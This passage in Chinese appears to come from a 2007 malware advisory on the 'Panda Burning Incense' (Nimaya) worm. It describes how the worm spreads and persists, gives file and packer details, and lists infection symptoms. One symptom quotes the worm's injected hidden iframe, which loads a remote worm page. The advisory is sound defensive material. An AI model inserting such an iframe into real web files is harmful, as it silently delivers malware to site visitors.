三、病毒描述
含有病毒體的文件被運行後,病毒將自身拷貝至系統目錄,同時修改注冊表將自身設置為開機啟動項,並遍歷各個驅動器,將自身寫入磁盤根目錄下,增加一個 Autorun.inf文件,使得用戶打開該盤時激活病毒體。隨後病毒體開一個線程進行本地文件感染,並對局域網其他電腦進行掃描,同時開另外一個線程連接某網站下載木馬程序進行發動惡意攻擊。
文件名稱:nvscv32.exe
病毒名稱:目前各殺毒軟件無法查殺(已經將病毒樣本上報各殺毒廠商)
中文名稱:(尼姆亞,熊貓燒香)
病毒大小:68,570 字節
編寫語言:Borland Delphi 6.0 - 7.0
加殼方式:FSG 2.0 -> bart/xt
發現時間:2007.1.16
危害等級:高
四、中毒現象
1:在系統每個分區根目錄下存在setup.exe和autorun.inf文件(A和B盤不感染)。
2:無法手工修改“文件夾選項”將隱藏文件顯示出來。
3:在每個感染後的文件夾中可見Desktop_ini的隱藏文件,內容為感染日期 如:2007-1-16
4:電腦上的所有腳本文件中加入以下代碼:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>
5:中毒後的機器上常見的反病毒軟件及防火牆無法正常開啟及運行。
6:不能正常使用任務管理器,SREng.exe等工具。
7:無故的向外發包,連接局域網中其他機器。
